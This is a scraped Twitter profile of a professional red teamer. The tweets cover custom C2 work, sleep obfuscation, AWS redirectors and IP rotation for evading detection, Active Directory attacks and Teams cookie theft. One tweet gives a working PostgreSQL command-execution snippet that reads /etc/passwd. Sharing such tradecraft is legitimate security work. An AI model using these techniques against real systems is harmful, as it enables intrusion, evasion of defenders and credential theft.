OtterHacker (@otterhacker)'s Twitter Profile
OtterHacker

@otterhacker

Professional red teamer and malware development enthusiast! I will share some tips and experiences. Look at my work here: otterhacker.github.io

ID: 1432380122959687680

Link: https://otterhacker.github.io | Joined: 30-08-2021 16:30:18

717 Tweets

6.6K Followers

76 Following

OtterHacker (@otterhacker) 's Twitter Profile Photo

If you missed my talk at BlackAlps, you can find the slide deck in my usual repo! The talk should be published at the end of the year! github.com/OtterHacker/Co…

Finally implemented a SOCKS in my custom C2. I faced several challenges regarding constant polling and timeouts due to the beacon sleep, but I'm quite happy with the performance!

Finally took the time to implement an Ekko-like sleep obfuscation (documented by 5pider) on my beacon! Thanks to all previous implementations it was quite easy. The technique might be well detected now, but I found the main principle very pretty!

Spent some time reworking my C2 built-in SOCKS to improve the performance. I can now rickroll people in 1080p through someone else's network... The SOCKS protocol is easy to implement, but it's easy to create a huge bottleneck when trying to implement it on a C2 agent...

I'm waiting for the moment when I will have to pentest applications developed with AI… I'm pretty sure it's going to be carnage…

If the first thing you do when you compromise an MSSQL server is to check for xp_cmdshell, you might want to read this... Using stored procedures you can enumerate the whole host, parse network shares and prepare your attack before xp_cmdshell... otterhacker.github.io/Pentest/Servic…

I was today years old when I learnt that you can't use an ST on the DC that generated it. It seems to be a security feature to avoid replay attacks. But if you activate Protected Users on a domain with one DC, you basically just locked yourself down but prevented attacks through SID History...

If you guys are still using CobaltStrike, here is a small terraform/ansible script to deploy a CS with an AWS redirector based on Lambda and CloudFront! It can be nice to bypass some companies' proxies or just to hide your true C2 IP. github.com/OtterHacker/AW…

When doing Red Team operations, you might need to refresh your public address frequently to avoid detection. Here is a small AWS infrastructure that will rotate your public address every 5 minutes without interrupting your scans or VPN. github.com/OtterHacker/AW…

I'm in my database period. RCE with PostgreSQL:

DROP TABLE IF EXISTS files;
CREATE TABLE files(filename text);
COPY files FROM PROGRAM 'cat /etc/passwd';
SELECT * FROM files ORDER BY filename ASC;

If you are still targeting Active Directory in 2025, you are not doing Red Team, but glorified pentest… If the AD can be compromised that easily, the company just needs an internal pentest…

Imagine if someone escaped Teams' Electron and opened Chrome devtools. It would be a shame if that someone stole the cookies like that...

Just a sanity check: is it possible to use B\MSOL in the SIDHistory of A\User to DCSync forest B from forest A? Or does it only work in the same forest due to a specific ACL check done by the DRS service that breaks the SIDHistory?

How can Azure be this painful: 10k different modules, not compatible with each other, some work on PowerShell, some only on PowerShell 7.